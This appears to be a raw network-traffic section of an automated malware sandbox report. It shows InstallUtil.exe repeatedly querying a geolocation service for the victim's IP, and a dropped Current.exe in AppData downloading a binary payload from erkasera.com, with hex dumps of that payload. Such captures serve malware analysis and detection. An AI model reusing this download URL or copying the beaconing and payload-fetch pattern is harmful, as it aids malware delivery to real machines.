                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Cs9KtJC4dbWvLkkkr8ok10LR5H4%2BALQ0SL4Ges%2FNrzmxnjZS6RjSBWUPzmeq3%2Bjhb%2BBbxKxEcmukGwPe%2BDqcmOq8pD68wM45ar%2Ff2FgKgEE7Gf4La2z2FFNhzZ89DJnQfOcOkEj0"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 8da983346d166b29-DFW
                                                      alt-svc: h3=":443"; ma=86400
                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1029&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=2765998&cwnd=251&unsent_bytes=0&cid=0f399a5d46c61685&ts=147&x=0"
                                                      2024-10-30 06:57:40 UTC359INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e
                                                      Data Ascii: <Response><IP>173.254.250.78</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      4192.168.2.549711188.114.96.34432460C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-10-30 06:57:41 UTC87OUTGET /xml/173.254.250.78 HTTP/1.1
                                                      Host: reallyfreegeoip.org
                                                      Connection: Keep-Alive
                                                      2024-10-30 06:57:42 UTC885INHTTP/1.1 200 OK
                                                      Date: Wed, 30 Oct 2024 06:57:41 GMT
                                                      Content-Type: text/xml
                                                      Content-Length: 359
                                                      Connection: close
                                                      apigw-requestid: AcLvmhW3vHcESEw=
                                                      Cache-Control: max-age=31536000
                                                      CF-Cache-Status: HIT
                                                      Age: 19484
                                                      Last-Modified: Wed, 30 Oct 2024 01:32:57 GMT
                                                      Accept-Ranges: bytes
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=j86EpcH%2BP1Us1rwfLGpHNpLN4QmAwPUD4%2FBnxGk7g0OT1cOkbaTj9eo4GnMotTWl1Xpq6%2BEl8Iprt5hUMiAp8D87td7BnaqdzTEgg5aHH6oPp8W3mcpa7d15NPJhmJVoS77g7tND"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 8da9833d692f6bd4-DFW
                                                      alt-svc: h3=":443"; ma=86400
                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1076&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=2635122&cwnd=251&unsent_bytes=0&cid=56aa48469f4aa89c&ts=146&x=0"
                                                      2024-10-30 06:57:42 UTC359INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e
                                                      Data Ascii: <Response><IP>173.254.250.78</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      5192.168.2.549713188.114.96.34432460C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-10-30 06:57:43 UTC63OUTGET /xml/173.254.250.78 HTTP/1.1
                                                      Host: reallyfreegeoip.org
                                                      2024-10-30 06:57:43 UTC887INHTTP/1.1 200 OK
                                                      Date: Wed, 30 Oct 2024 06:57:43 GMT
                                                      Content-Type: text/xml
                                                      Content-Length: 359
                                                      Connection: close
                                                      apigw-requestid: AcLvmhW3vHcESEw=
                                                      Cache-Control: max-age=31536000
                                                      CF-Cache-Status: HIT
                                                      Age: 19486
                                                      Last-Modified: Wed, 30 Oct 2024 01:32:57 GMT
                                                      Accept-Ranges: bytes
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5fYQeNladIU1%2BbCi7vemNnntDb0WpuP5BenE9aHiFUWwR3i5j5rNldX4oyS8FJpNlWSEjUFl8M0FpyauWozTtqSHVP%2F%2FfESAdc2gxDVwgXXDVhAMZtZqguL58qQTRAAxMwL%2F6uWN"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 8da98346ad496c7c-DFW
                                                      alt-svc: h3=":443"; ma=86400
                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1835&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2851&recv_bytes=701&delivery_rate=1643586&cwnd=247&unsent_bytes=0&cid=3fa92389d2e8c56e&ts=148&x=0"
                                                      2024-10-30 06:57:43 UTC359INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e
                                                      Data Ascii: <Response><IP>173.254.250.78</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      6192.168.2.549715188.114.96.34432460C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-10-30 06:57:44 UTC87OUTGET /xml/173.254.250.78 HTTP/1.1
                                                      Host: reallyfreegeoip.org
                                                      Connection: Keep-Alive
                                                      2024-10-30 06:57:44 UTC889INHTTP/1.1 200 OK
                                                      Date: Wed, 30 Oct 2024 06:57:44 GMT
                                                      Content-Type: text/xml
                                                      Content-Length: 359
                                                      Connection: close
                                                      apigw-requestid: AcLvmhW3vHcESEw=
                                                      Cache-Control: max-age=31536000
                                                      CF-Cache-Status: HIT
                                                      Age: 19487
                                                      Last-Modified: Wed, 30 Oct 2024 01:32:57 GMT
                                                      Accept-Ranges: bytes
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JREZiKF7xpXJHWr6TNlfEzDRA0RC%2B%2Bj3Pk1aBFtkiVViFH85LGw3s4j9zz5UFIE%2FnIiGr1TABa%2BdqKUHjbeY7cNjXJBNqCVFMgHbIYLk%2F0zHR0PmNCXipX1LEhs1yjm0xAboNdgf"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 8da9834fb91e6c39-DFW
                                                      alt-svc: h3=":443"; ma=86400
                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1930&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=1495867&cwnd=235&unsent_bytes=0&cid=ddb879cf31c77403&ts=150&x=0"
                                                      2024-10-30 06:57:44 UTC359INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e
                                                      Data Ascii: <Response><IP>173.254.250.78</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      7192.168.2.549717188.114.96.34432460C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-10-30 06:57:46 UTC87OUTGET /xml/173.254.250.78 HTTP/1.1
                                                      Host: reallyfreegeoip.org
                                                      Connection: Keep-Alive
                                                      2024-10-30 06:57:46 UTC883INHTTP/1.1 200 OK
                                                      Date: Wed, 30 Oct 2024 06:57:46 GMT
                                                      Content-Type: text/xml
                                                      Content-Length: 359
                                                      Connection: close
                                                      apigw-requestid: AcLvmhW3vHcESEw=
                                                      Cache-Control: max-age=31536000
                                                      CF-Cache-Status: HIT
                                                      Age: 19489
                                                      Last-Modified: Wed, 30 Oct 2024 01:32:57 GMT
                                                      Accept-Ranges: bytes
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FXMvm0Iq2Z4r2oVdSSwXVSWxR8YGJEwr4ONSs0YO7M59hXdafjNUHcMO5jyZgW8kspeX4frIunPqwRwZ0voXkQjcqC%2Bb9p9X8sdK21aeCzfTTlrHAab5yAW8pVK6sfCJDcKPijNt"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 8da98358bedd4617-DFW
                                                      alt-svc: h3=":443"; ma=86400
                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1672&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=1777777&cwnd=251&unsent_bytes=0&cid=8f77c2e3ee559658&ts=145&x=0"
                                                      2024-10-30 06:57:46 UTC359INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e
                                                      Data Ascii: <Response><IP>173.254.250.78</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      8192.168.2.549720188.114.96.34432460C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-10-30 06:57:47 UTC87OUTGET /xml/173.254.250.78 HTTP/1.1
                                                      Host: reallyfreegeoip.org
                                                      Connection: Keep-Alive
                                                      2024-10-30 06:57:47 UTC885INHTTP/1.1 200 OK
                                                      Date: Wed, 30 Oct 2024 06:57:47 GMT
                                                      Content-Type: text/xml
                                                      Content-Length: 359
                                                      Connection: close
                                                      apigw-requestid: AcLvmhW3vHcESEw=
                                                      Cache-Control: max-age=31536000
                                                      CF-Cache-Status: HIT
                                                      Age: 19490
                                                      Last-Modified: Wed, 30 Oct 2024 01:32:57 GMT
                                                      Accept-Ranges: bytes
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=H4WF6a3XZgFAQZcgBg1t41XaIePxThlmHrGaRHZW62V5zs%2FpXgjMNa%2BYiF%2F6n6V0iQfKI73ivTV6vgGgqZAvWlUy4y5Ylw3dXwgvnAskMjrQRlx4mth43GiQ6sqIhm17RHhws77p"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 8da98361ad11e75e-DFW
                                                      alt-svc: h3=":443"; ma=86400
                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1353&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2098550&cwnd=251&unsent_bytes=0&cid=72ca2aa0517d19a0&ts=151&x=0"
                                                      2024-10-30 06:57:47 UTC359INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e
                                                      Data Ascii: <Response><IP>173.254.250.78</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      9192.168.2.549724188.132.193.46443528C:\Users\user\AppData\Roaming\Current.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-10-30 06:57:51 UTC83OUTGET /seuias/Mccudidikm.vdf HTTP/1.1
                                                      Host: erkasera.com
                                                      Connection: Keep-Alive
                                                      2024-10-30 06:57:51 UTC207INHTTP/1.1 200 OK
                                                      Connection: close
                                                      content-type: application/octet-stream
                                                      last-modified: Tue, 29 Oct 2024 08:54:25 GMT
                                                      accept-ranges: bytes
                                                      content-length: 951304
                                                      date: Wed, 30 Oct 2024 06:57:30 GMT
                                                      2024-10-30 06:57:51 UTC16384INData Raw: bd b4 d8 36 9a 60 6e 4c fa 9f c2 b9 11 00 9c bd 36 04 29 9d be 12 34 39 0e e0 74 c7 b3 e8 20 ab e4 d2 47 d1 02 74 d6 ac 64 6f 00 a8 7f 4c 70 45 c9 5c fe ff 79 9f 4b e6 35 1f aa c6 e2 10 0a 8c 57 9a f2 2f d4 3a d5 ab 13 19 0b 07 87 51 a7 c0 7c 0b 48 83 c9 c6 0c 77 68 91 db 67 e6 f3 a6 7f 87 cd cb 74 ee 33 39 50 7c 26 37 06 a9 cb 6c 1b a2 40 05 5a 71 4c e2 76 3a 2a 1a 7d 08 8c a2 77 58 81 cd 48 2d 3c e5 6d a2 61 95 90 68 9e 8f 01 10 77 2c 9c e5 49 b0 69 64 56 dc 58 d9 84 f4 fb b1 8a e0 c5 29 4c 82 28 19 c7 b3 02 6e 43 4b b0 c6 23 4d 01 fe 20 94 dc cb 0d 30 cf b3 1e 82 cf f0 97 62 96 b5 ba f4 a9 ee 1f 00 a3 07 5a 25 df ff 00 cd d8 9c 38 49 39 91 bb c6 85 9b cd 75 3c 6f 4e 96 39 31 ec b8 4d 61 d6 a8 9a 75 15 c9 cb 17 bc ea 4b b7 83 85 00 ec e0 33 d2 67 66 fa
                                                      Data Ascii: 6`nL6)49t GtdoLpE\yK5W/:Q|Hwhgt39P|&7l@ZqLv:*}wXH-<mahw,IidVX)L(nCK#M 0bZ%8I9u<oN91MauK3gf
                                                      2024-10-30 06:57:51 UTC16384INData Raw: 14 3c 60 7e 0a 18 48 44 e1 b0 a6 c0 2a 41 d0 a4 ee 2f 06 8b 4a f1 3e 22 e3 18 32 a9 b6 7f 70 32 d8 eb 9d 80 82 70 ca 68 e0 12 ab ad 72 51 9a f0 6b aa f3 72 f8 2e 57 ef f6 36 9c fd 95 a1 57 33 9e 28 ca e9 01 47 0f 1c 00 dd 10 25 a3 6c 7c 89 10 7f 0b 53 85 a0 93 da 6f 22 dd 48 c8 92 29 50 2e 20 f7 4a 6a 51 f5 12 75 a9 43 26 04 ac 95 e9 59 e7 28 cf 3a e6 5a e8 1e 9e c6 c7 e6 bb dc d6 73 7d 31 da d1 d2 64 44 bc 3f d2 4b 58 49 2b dd 7c d2 1a 77 bf 9c 0b 6b 1a 18 b0 61 e3 94 f6 80 da a5 79 41 09 68 a5 d8 16 02 65 5c ff c3 11 2a 6e e9 e2 a2 10 af 44 52 09 f2 63 b0 87 10 7a 5f ca b4 df 72 0f 4e ad e8 68 10 3d 7d 3d cf 05 8b 03 cc 4f ea a3 d7 1d 52 d9 37 62 bb 29 c2 91 4e 96 7c 08 fa 19 03 47 80 63 0a c0 9a 06 a8 4c bb 1b 75 34 82 81 55 08 ab 06 91 7e 93 48 e3 3a
                                                      Data Ascii: <`~HD*A/J>"2p2phrQkr.W6W3(G%l|So"H)P. JjQuC&Y(:Zs}1dD?KXI+|wkayAhe\*nDRcz_rNh=}=OR7b)N|GcLu4U~H:
                                                      2024-10-30 06:57:51 UTC16384INData Raw: e7 34 29 34 13 20 80 8c 0e 1a 09 4f 14 26 32 21 40 db 28 5c e8 bf 03 98 3c fb 14 db d9 41 c9 7c 08 9f 9d 83 cb 21 53 83 10 46 5a 0c b1 f1 13 40 d8 12 1e 32 cd 17 28 a3 44 70 be cc c1 af 54 82 80 8c bc dd f4 c8 a9 91 f3 18 f9 a6 81 ec 4e 9c a9 d3 a7 de e2 30 db ea 1d e6 d7 4b af 3d b5 af 1d c1 af f1 d1 8b 3b 8e d6 83 51 66 f2 42 52 18 ad 4d ec 67 a6 64 93 8b b6 60 49 4b e5 32 5c 5f db 5c c2 09 89 63 0e a5 67 0e 1d 0a 3c 0e 0e c1 a1 cc 28 52 51 b4 b1 24 e5 cb 9c 77 53 55 d0 0c 64 46 83 5b d2 bf ce 2a 69 db b5 86 22 91 3f 94 1c 1f 40 6e 65 6d 7c fe 66 bf 2b 0f e7 08 3c d5 ab b5 f9 ac de 99 97 3c bc e6 c9 6b 03 bb 03 5a ee 99 7c 99 d3 78 7d 96 68 7a 95 36 b9 fa 75 40 81 75 b6 26 77 50 0a 09 35 15 c2 3c 80 42 d9 80 10 d3 ac 73 71 3e b0 51 38 b4 4d 60 21 df ff
                                                      Data Ascii: 4)4 O&2!@(\<A|!SFZ@2(DpTN0K=;QfBRMgd`IK2\_\cg<(RQ$wSUdF[*i"?@nem|f+<<kZ|x}hz6u@u&wP5<Bsq>Q8M`!
                                                      2024-10-30 06:57:51 UTC16384INData Raw: 1b 86 71 54 2e ce e8 40 0b 33 c7 cb f8 94 61 d6 28 bf 18 f8 9d 64 6b a9 de 4c aa e9 bd 62 1a d1 c7 57 46 e5 27 ce c7 af fc c7 7c 0e ab 09 de 6b c7 89 8a ce b1 61 fa 92 08 b8 19 47 60 38 e3 54 c4 4f 65 2a ba 2b 19 e4 06 83 4f df de 06 13 1d 12 0f 91 13 3b 21 21 c4 5a 74 70 30 21 20 d3 21 48 c7 2b 01 4b b0 76 09 bd 01 77 4f 66 dd 0e 49 1b 26 3d e8 eb c7 7d 26 37 d8 7f c4 6b 9d 43 aa 46 6b c4 6f e2 98 32 4e f2 de eb ca d2 09 a3 d9 42 45 19 c0 9f 3b f8 40 23 ab 20 4a ce af 58 3a 54 26 43 78 7f f5 84 f9 ca 45 c9 2a ac be b4 9d f6 be 8d b5 24 dd d6 8e 6d ea 40 6b 9d 5a a3 34 6e 61 c8 dd cc d3 2f 65 e5 b7 4e 3a 24 b0 06 24 09 ea 97 93 2f 5f 10 37 0d ef bd fe 09 4d dc cd 8b 59 ec de f3 c2 e8 e3 7a 53 3f 04 57 a1 c3 2d d6 5f 36 3c d6 cd c7 70 b1 3b 67 02 7c ac a4
                                                      Data Ascii: qT.@3a(dkLbWF'|kaG`8TOe*+O;!!Ztp0! !H+KvwOfI&=}&7kCFko2NBE;@# JX:T&CxE*$m@kZ4na/eN:$$/_7MYzS?W-_6<p;g|
                                                      2024-10-30 06:57:51 UTC16384INData Raw: 9e 0a 63 90 52 c3 c3 6b 64 a7 c1 97 60 7b cf c8 ec 5f dd d2 50 59 29 6a d2 0b a6 12 5d 17 ff 34 ab 85 82 c0 30 7f 35 8d 54 ff 0b 86 40 98 a7 e2 e9 02 01 f1 29 ba 50 e5 a1 72 ff 30 5b 9d 8e 4d 33 50 56 be 6c d9 7e 1e d0 fe a1 81 50 c8 cb 12 5e 08 31 17 99 0f 15 78 d2 2f 10 0e 18 2d da b0 1d 8e 89 2f 9c 38 0c f8 88 58 38 cb 53 19 97 16 de d0 46 93 09 1c 2d 5a 90 0d 42 f5 17 20 3f ff 62 25 2a d8 18 d3 de eb c6 6f f1 e1 ec c7 22 dc 89 d7 4e fa 86 e5 74 c0 76 2e 60 92 52 a0 18 5a 19 a7 89 ee 2b 90 9e 55 1e c2 fd 35 7d d7 81 99 79 50 42 53 bb cf 96 2b 5c 76 26 66 27 59 dd 4f a3 7f 1f d1 de 26 4e 6e 89 cb a9 19 9b c5 a0 52 e1 b7 1f 03 99 2b 29 fb b7 89 6a ed c5 2f 92 f8 b1 96 c9 34 2d 66 4a bd 3c e4 1b 81 db a6 1b e2 54 c1 1d d8 94 c9 5f 65 4c 08 69 47 48 14 96
                                                      Data Ascii: cRkd`{_PY)j]405T@)Pr0[M3PVl~P^1x/-/8X8SF-ZB ?b%*o"Ntv.`RZ+U5}yPBS+\v&f'YO&NnR+)j/4-fJ<T_eLiGH
                                                      2024-10-30 06:57:51 UTC16384INData Raw: da f3 81 5f 19 16 34 7e cd 24 97 f5 27 f5 26 d1 02 78 a6 4c 80 8f fb 36 4c 17 33 cd 85 65 10 1b 36 ee 74 f4 c6 10 df c5 47 be fb 41 c7 b2 18 90 f0 b7 0e 7f a1 d9 b6 a2 6b 1b f2 f0 a1 0c 13 f5 81 94 53 03 c4 31 62 d0 c5 ae 48 e6 27 62 a2 46 cd 04 4e c4 f1 27 29 52 15 43 37 1e 17 cb 1d 3b b2 52 45 d7 73 51 17 67 7e b4 10 52 7c dc dc 5c c7 2d 76 80 10 fe 95 42 98 39 14 c1 44 a9 14 bb 8e 9e ae 39 73 a2 f9 47 78 5e 53 22 96 f9 ea 7c cd 69 9a f8 ac 40 f4 f5 48 57 fe 7a 01 2d d9 53 7b 35 38 d4 20 b6 42 25 7d a7 ad f7 72 a1 34 7c 0b b7 5d 81 4c e3 20 2d 16 9e b1 63 cd 70 14 4b 76 34 a9 c3 1e 64 ee e2 b6 25 71 80 08 c4 57 02 b2 12 46 07 e3 6d 7f cc 9f 12 c3 cd 7d cc a3 ca 30 77 0d 73 67 92 04 85 e6 16 82 74 fb 39 ce f5 d1 9f d1 b5 c5 a1 e6 01 fa f2 cb a9 23 31 1c
                                                      Data Ascii: _4~$'&xL6L3e6tGAkS1bH'bFN')RC7;REsQg~R|\-vB9D9sGx^S"|i@HWz-S{58 B%}r4|]L -cpKv4d%qWFm}0wsgt9#1
                                                      2024-10-30 06:57:51 UTC16384INData Raw: c4 08 56 4f ed 2f 81 b0 d6 83 9c a3 00 06 aa eb 2d 68 83 8e 16 cc 47 7e 5f ca 1e 51 19 0f b5 56 5b 6b ff b9 27 41 82 dc 7e ba bb d9 da 32 d4 d9 58 8d 33 15 27 f0 b6 34 7b cb 28 9b 90 b9 af 0c ce 2e 08 4c 8d dc f8 ea 15 5e 2a f4 f7 a6 aa 49 a5 76 a2 c2 55 56 e2 46 dd 85 43 69 35 9b 0b 15 5e af 40 a5 2b 25 32 35 ed e2 f9 af 9e df 83 34 c6 af 6a 7f f5 c9 cd bb 1c 1b 56 9c fa 96 ed 41 21 2f 0d 5d ab 19 9e 9a 9b da b6 46 4e 78 cd d7 dc 0d 12 af ad d2 f7 dc 6b a8 b2 5e 1a 50 43 d5 94 22 02 9f f7 91 1c 47 07 41 c3 e4 a7 78 bb 94 37 0d e9 0c 00 53 68 ef 61 80 25 f2 8a 46 ff 09 51 21 82 1e 81 ea c4 aa 96 b1 a6 e8 89 f4 a3 67 38 ca 7f e7 06 6e 08 8b 02 5b d2 3d 89 c9 db 54 a3 e4 00 95 e1 40 58 df 1c d8 36 39 b1 a9 b0 d4 cf dd 3b be 6e 56 bd 7a 20 5e 04 0c 74 3a ff
                                                      Data Ascii: VO/-hG~_QV[k'A~2X3'4{(.L^*IvUVFCi5^@+%254jVA!/]FNxk^PC"GAx7Sha%FQ!g8n[=T@X69;nVz ^t:
